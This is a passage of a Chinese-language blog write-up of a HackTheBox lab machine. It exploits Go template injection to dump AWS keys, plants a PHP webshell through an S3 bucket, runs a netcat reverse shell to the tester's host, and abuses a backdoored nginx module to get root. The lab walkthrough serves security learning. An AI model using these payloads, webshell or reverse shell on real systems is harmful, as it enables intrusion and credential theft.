templates.ExecuteTemplate(w, tmpl, page)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">    http.Error(w, err.Error(), http.StatusInternalServerError)</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">IndexHandler</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">  <span class="keyword">switch</span> r.Method &#123;</span><br><span class="line">  <span class="keyword">case</span> <span class="string">&quot;GET&quot;</span>:</span><br><span class="line">	page := &amp;Data&#123;Title:<span class="string">&quot;Home page&quot;</span>, Body:<span class="string">&quot;Welcome to our brand new home page.&quot;</span>&#125;</span><br><span class="line">	renderTemplate(w, <span class="string">&quot;index&quot;</span>, page)</span><br><span class="line">  <span class="keyword">case</span> <span class="string">&quot;POST&quot;</span>:</span><br><span class="line">	page := &amp;Data&#123;Title:<span class="string">&quot;Home page&quot;</span>, Body:<span class="string">&quot;Welcome to our brand new home page.&quot;</span>&#125;</span><br><span class="line">    <span class="keyword">if</span> r.FormValue(<span class="string">&quot;password&quot;</span>) == <span class="string">&quot;ippsSecretPassword&quot;</span> &#123;</span><br><span class="line">      renderTemplate(w, <span class="string">&quot;source&quot;</span>, page )</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      renderTemplate(w, <span class="string">&quot;index&quot;</span>, page)</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">ForgotHandler</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">    <span class="keyword">switch</span> r.Method &#123;</span><br><span class="line">    <span class="keyword">case</span> <span class="string">&quot;GET&quot;</span>:</span><br><span class="line">      page := &amp;Data&#123;Title:<span class="string">&quot;Forgot Password&quot;</span>, Body:<span class="string">&quot;&quot;</span>&#125;</span><br><span class="line">      renderTemplate(w, <span class="string">&quot;forgot&quot;</span>, page)</span><br><span class="line">    <span class="keyword">case</span> <span class="string">&quot;POST&quot;</span>:</span><br><span class="line">      <span class="keyword">var</span> user1 = &amp;User&#123;<span class="number">1</span>, <span class="string">&quot;ippsec@hacking.esports&quot;</span>, <span class="string">&quot;ippsSecretPassword&quot;</span>&#125;</span><br><span class="line">      <span class="keyword">var</span> tmpl = fmt.Sprintf(<span class="string">`Email Sent To: %s`</span>, r.FormValue(<span class="string">&quot;email&quot;</span>))</span><br><span class="line"></span><br><span class="line">      t, err := template.New(<span class="string">&quot;page&quot;</span>).Parse(tmpl)</span><br><span class="line">      <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">          fmt.Println(err)</span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">var</span> tpl bytes.Buffer</span><br><span class="line">      t.Execute(&amp;tpl, &amp;user1)</span><br><span class="line">      page := &amp;Data&#123;Title:<span class="string">&quot;Forgot Password&quot;</span>, Body:tpl.String()&#125;</span><br><span class="line">      renderTemplate(w, <span class="string">&quot;forgot&quot;</span>, page)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">  http.HandleFunc(<span class="string">&quot;/&quot;</span>, IndexHandler)</span><br><span class="line">  http.HandleFunc(<span class="string">&quot;/forgot/&quot;</span>, ForgotHandler)</span><br><span class="line">  log.Fatal(http.ListenAndServe(<span class="string">&quot;:80&quot;</span>, <span class="literal">nil</span>))</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>同样的，源码中可以看到<code>Debugcmd</code>函数会直接执行命令。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">func (u User) DebugCmd (test string) string &#123;</span><br><span class="line">  ipp := strings.Split(test, &quot; &quot;)</span><br><span class="line">  bin := strings.Join(ipp[:1], &quot; &quot;)</span><br><span class="line">  args := strings.Join(ipp[1:], &quot; &quot;)</span><br><span class="line">  if len(args) &gt; 0&#123;</span><br><span class="line">    out, _ := exec.Command(bin, args).CombinedOutput()</span><br><span class="line">    return string(out)</span><br><span class="line">  &#125; else &#123;</span><br><span class="line">    out, _ := exec.Command(bin).CombinedOutput()</span><br><span class="line">    return string(out)</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>还是同样的地方进行ssti调用他的函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">email=&#123;&#123;.DebugCmd &quot;env&quot;&#125;&#125;admin%40q.com</span><br></pre></td></tr></table></figure>

<p>得到环境中的aksk</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">HOSTNAME=aws</span><br><span class="line">PWD=/opt/uhc</span><br><span class="line">HOME=/root</span><br><span class="line">AWS_SECRET_ACCESS_KEY=SXBwc2VjIFdhcyBIZXJlIC0tIFVsdGltYXRlIEhhY2tpbmcgQ2hhbXBpb25zaGlwIC0gSGFja1RoZUJveCAtIEhhY2tpbmdFc3BvcnRz</span><br><span class="line">SHLVL=0</span><br><span class="line">AWS_ACCESS_KEY_ID=SXBwc2VjIFdhcyBIZXJlIC0tIFVsdGltYXRlIEhhY2tpbmcgQ2hhbXBpb25zaGlwIC0gSGFja1RoZUJveCAtIEhhY2tpbmdFc3BvcnRz</span><br><span class="line">PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</span><br><span class="line">DEBIAN_FRONTEND=noninteractive</span><br><span class="line">OLDPWD=/</span><br><span class="line">_=/usr/bin/env</span><br></pre></td></tr></table></figure>

<p>root目录中的<code>.bashistory</code>并没有被清空，之前有人在这台机器上执行过s3的相关操作，说明box上有aws的s3服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">ls</span><br><span class="line">aws s3 ls s3://</span><br><span class="line">aws s3 ls s3://website</span><br><span class="line">aws s3 rm s3://website/ippsec.php</span><br><span class="line">aws s3 ls s3://website</span><br><span class="line">exit</span><br></pre></td></tr></table></figure>

<p>尝试revshell，奇怪的是容器并不能和我直接进行通信</p>
<p>在他的<code>/opt/uhc</code>下还有一个ELF程式<code>main</code>，有8M大，我尝试base64往外拉，一万多行，想了下还是算了，感觉htb不会这样恶心人</p>
<p>写shell到当前的web目录下，也没有同步过去，考虑了一下突破口，可能他是把web目录丢在了s3然后用website起的</p>
<p>看一下s3的website</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">email=&#123;&#123;.DebugCmd &quot;aws s3 ls s3://website&quot;&#125;&#125;admin%40q.com</span><br><span class="line"></span><br><span class="line">css/</span><br><span class="line">2024-11-27 06:24:35          2 1</span><br><span class="line">2024-11-27 04:51:13    1294778 bottom.png</span><br><span class="line">2024-11-27 04:51:12     165551 header.png</span><br><span class="line">2024-11-27 04:51:12          5 index.html</span><br><span class="line">2024-11-27 04:51:12       1803 index.php</span><br></pre></td></tr></table></figure>

<p>其中的index.html在down下来后会发现其内容，和一开始目录扫描80口的index.html内容相同</p>
<p>很简单就可以想到webshell写到桶里就好</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">└─$ echo -en &#x27;&lt;?=`$_GET[0]`?&gt;;&#x27;|base64  -w 0</span><br><span class="line">PD89YCRfR0VUWzBdYD8+Ow== </span><br><span class="line"></span><br><span class="line">email=&#123;&#123;.DebugCmd &quot;echo &#x27;%50%44%38%39%59%43%52%66%52%30%56%55%57%7a%42%64%59%44%38%2b%4f%77%3d%3d&#x27;|base64 -d &gt; a.php&quot;&#125;&#125;admin%40q.com</span><br><span class="line"></span><br><span class="line">email=&#123;&#123;.DebugCmd &quot;aws s3 cp ./a.php  s3://website/a.php&quot;&#125;&#125;admin%40q.com</span><br></pre></td></tr></table></figure>

<p>测试一下，发现拿到了宿主机的用户，连逃逸都没</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">└─$ curl 10.10.11.113/a.php?0=whoami </span><br><span class="line">www-data</span><br></pre></td></tr></table></figure>

<p>revshell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">└─$ curl &#x27;10.10.11.113/a.php?0=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.16.12%2010086%20%3E%2Ftmp%2Ff&#x27;</span><br></pre></td></tr></table></figure>

<p>神奇的是在ubuntu用户下和当前www-data用户的家目录下都放了一个user.txt</p>
<h2 id="to-Root"><a href="#to-Root" class="headerlink" title="to Root"></a>to Root</h2><p>在<code>/opt/deploy</code>下有刚才用到的容器的配置文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">www-data@gobox:/opt/deploy$ cat docker-compose.yml</span><br><span class="line">version: &#x27;3.2&#x27;</span><br><span class="line">services:</span><br><span class="line">  localstack:</span><br><span class="line">    image: localstack/localstack:latest</span><br><span class="line">    container_name: localstack_demo</span><br><span class="line">    ports:</span><br><span class="line">      - &quot;9000:4566&quot;</span><br><span class="line">    environment:</span><br><span class="line">      - SERVICES=s3</span><br><span class="line">      - DATA_DIR=/tmp/localstack/data</span><br><span class="line">    volumes:</span><br><span class="line">      - &#x27;./.localstack:/tmp/localstack&#x27;</span><br><span class="line">      - &#x27;/var/run/docker.sock:/var/run/docker.sock&#x27;</span><br><span class="line">    restart: unless-stopped</span><br><span class="line">  gossti:</span><br><span class="line">    build:</span><br><span class="line">        context: .</span><br><span class="line">        dockerfile: gossti/Dockerfile</span><br><span class="line">    image: gossti</span><br><span class="line">    ports:</span><br><span class="line">      - &quot;9001:80&quot;</span><br><span class="line">    container_name: gossti</span><br><span class="line">    hostname: aws</span><br><span class="line">    restart: unless-stopped</span><br></pre></td></tr></table></figure>

<p>4566放了个aws的stack，80是个正常的ng映射出去的，妈的好奇怪，那我的webshell应该是传到了4566的s3容器里，他容器9001映射到了容器的80映射过来的，搞得我好乱</p>
<p>然后还有个从s3同步内容的脚本</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">www-data@gobox:/opt/deploy/.localstack/data$ <span class="built_in">cat</span> mirrors3.py</span><br><span class="line">import json</span><br><span class="line">import sys</span><br><span class="line">from <span class="built_in">base64</span> import b64decode</span><br><span class="line"></span><br><span class="line">bucket_name = <span class="string">&#x27;/website&#x27;</span></span><br><span class="line">bucket_len = len(bucket_name)</span><br><span class="line"></span><br><span class="line">s3file = open(<span class="string">&#x27;/home/ubuntu/localstack/.localstack/data/recorded_api_calls.json&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> s3file.readlines():</span><br><span class="line">    item = json.loads(line)</span><br><span class="line">    <span class="keyword">if</span> item[<span class="string">&#x27;p&#x27;</span>][:bucket_len] == bucket_name and len(item[<span class="string">&#x27;d&#x27;</span>]) &gt; 0:</span><br><span class="line">        fname = item[<span class="string">&#x27;p&#x27;</span>][bucket_len + 1:]</span><br><span class="line">        <span class="comment"># LFI Protection</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;..&quot;</span> <span class="keyword">in</span> fname or fname[1:] == <span class="string">&quot;/&quot;</span>:</span><br><span class="line">            sys.exit(0)</span><br><span class="line">        f = open(f<span class="string">&quot;/opt/website/&#123;fname&#125;&quot;</span>, <span class="string">&#x27;w&#x27;</span>)</span><br><span class="line">        f.write(b64decode(item[<span class="string">&#x27;d&#x27;</span>]).decode())</span><br><span class="line">        f.close()</span><br><span class="line">s3file.close()</span><br></pre></td></tr></table></figure>

<p>看样子他是把s3的内容都放在了<code>recorded_api_calls.json[d]</code>,这个recorded_api_calls.json应该和4566容器内的s3相关连，而后他再把s3桶上传的内容同步到宿主机的<code>/opt/website/</code>下</p>
<p>那上传到桶里的webshell出现在宿主机就不奇怪了</p>
<p>linpeas扫了下，看见他ng的8000的配置很怪</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">/etc/nginx/sites-available/default </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">server &#123;</span><br><span class="line">        listen 127.0.0.1:8000;</span><br><span class="line">        location / &#123;</span><br><span class="line">                command on;</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个<code>command on</code>之前没见过这个配置,可能是拓展的模块</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">www-data@gobox:/etc/nginx/modules-enabled$ <span class="built_in">cat</span> 50-backdoor.conf</span><br><span class="line">load_module modules/ngx_http_execute_module.so;</span><br></pre></td></tr></table></figure>

<p>开启的模块配置确实有一个backdoor</p>
<p>看一下位置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">www-data@gobox:/tmp$ nginx -V &gt; ng                  </span><br><span class="line">nginx version: nginx/1.18.0 (Ubuntu)                </span><br><span class="line">....                                      </span><br><span class="line">configure arguments: ... --modules-path=/usr/lib/nginx/modules ...</span><br></pre></td></tr></table></figure>

<p>找到so文件脱下来逆一下</p>
<p>其中有一个字符串引起了我的注意</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">while</span> ( v8 &lt;= *offset + n );</span><br><span class="line">      *str = (char *)ngxexecute_realloc2(<span class="string">&quot;/home/ubuntu/NginxExecute//ngx_result.c&quot;</span>, 122, *str, v8);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>我猜想这应该是个现成的项目，所以去搜了下<code>NginxExecute</code>,就找到了他的项目库</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/limithit/NginxExecute">https://github.com/limithit/NginxExecute</a></p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Usage: view-source:http://192.168.18.22/?system.run[command] or curl -g &quot;http://192.168.18.22/?system.run[command]&quot; The command can be any system command. The command you will want to use depends on the permissions that nginx runs with.</span><br><span class="line"></span><br><span class="line">view-source:http://192.168.18.22/?system.run[ifconfig]</span><br><span class="line">If using browser to send command, make sure to use &quot;view source&quot; if you want to see formatted output. Alternatively, you can also use some tools such as Postman, Fiddler.</span><br><span class="line"></span><br><span class="line">The commands which require user interaction or constantly update their output (e.g. top) will not run properly, so do not file a bug for this.</span><br></pre></td></tr></table></figure>

<p>加载这个模块后可以通过<code>/?system.run[commands]</code>的形式执行命令</p>
<p>不过这里我直接使用system.run的话对端并没有反应，所以继续逆</p>
<p>在<code>ngx_http_execute_handler</code>发现如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">if ( (r-&gt;method &amp; 0xE) != 0 )</span><br><span class="line">&#123;</span><br><span class="line">  data = r-&gt;args.data;</span><br><span class="line">  if ( !memcmp(data, &quot;ippsec.run&quot;, 0xAuLL) )</span><br><span class="line">    urlargs_12670 = strndup((const char *)data, strlen((const char *)data) - 15);</span><br><span class="line">  memset(outargs, 0, sizeof(outargs));</span><br><span class="line">  parse_command(urlargs_12670, key, 0x800uLL, parameters, 0x800uLL);</span><br><span class="line">  urldecode(outargs, parameters);</span><br><span class="line">  cmd_result = 0LL;</span><br><span class="line">  ngxexecute_execute(outargs, &amp;cmd_result, error, 0x800uLL);</span><br><span class="line">  free(urlargs_12670);</span><br></pre></td></tr></table></figure>

<p>他将检测的<code>system</code>替换为了<code>ippsec</code>，于是再试一下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">www-data@gobox:/home/ubuntu$ curl http://127.0.0.1:8000/?ippsec.run[<span class="built_in">whoami</span>] -s </span><br><span class="line">root</span><br></pre></td></tr></table></figure>

<p><code>chmod +s /bin/bash</code></p>
<p>get Root</p>
<hr>
<p>最后这个<code>[]</code>的处理我比较好奇就看了下是这个部分做的</p>
<p>初始的<code>*i</code>指向的如果是<code>[</code>就会继续，然后<code>v10=i+1</code>使得<code>v10</code>指向的下一个字符地址，如果<code>i[1]</code>存在则v11指向的地址会一直不断递增到空即i的最后以为字符位置，再对<code>11-1</code>判断最后一个字符是否为<code>]</code>，v12就是v11(最大长度)-1（’\x0’）-v10(<code>[</code>后一位的位置)得到params部分的长度</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">if ( *i == &#x27;[&#x27; )</span><br><span class="line">    &#123;</span><br><span class="line">      v10 = i + 1;</span><br><span class="line">      if ( i[1] )</span><br><span class="line">      &#123;</span><br><span class="line">        v11 = i + 1;</span><br><span class="line">        do</span><br><span class="line">          ++v11;</span><br><span class="line">        while ( *v11 );</span><br><span class="line">      &#125;</span><br><span class="line">      else</span><br><span class="line">      &#123;</span><br><span class="line">        v11 = i + 1;</span><br><span class="line">      &#125;</span><br><span class="line">      v8 = 0;</span><br><span class="line">      if ( *(v11 - 1) == &#x27;]&#x27; )</span><br><span class="line">      &#123;</span><br><span class="line">        if ( param )</span><br><span class="line">        &#123;</span><br><span class="line">          v12 = v11 - 1 - v10;</span><br><span class="line">          if ( v12 &lt; param_max_len )</span><br><span class="line">          &#123;</span><br><span class="line">            memcpy(param, v10, v11 - 1 - v10);</span><br><span class="line">            param[v12] = 0;</span><br><span class="line">            return 2;</span><br><span class="line">          &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        else</span><br><span class="line">        &#123;</span><br><span class="line">          return 2;</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/2024/11/29/Tracks-cloud-Epsilon/"
      title="Tracks-cloud-Epsilon"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        Tracks-cloud-Epsilon
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2024/11/25/Tracks-cloud-Monteverde/"
      title="Tracks-cloud-Monteverde"
     >

    <p class="title-text">
      
        Tracks-cloud-Monteverde
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>





    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2024 Flower<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn hide" onclick="topFunction()">
        <i class="fa-solid fa-angle-up"></i>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.classList.remove('hide')
        } else {
            btn.classList.add('hide')
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
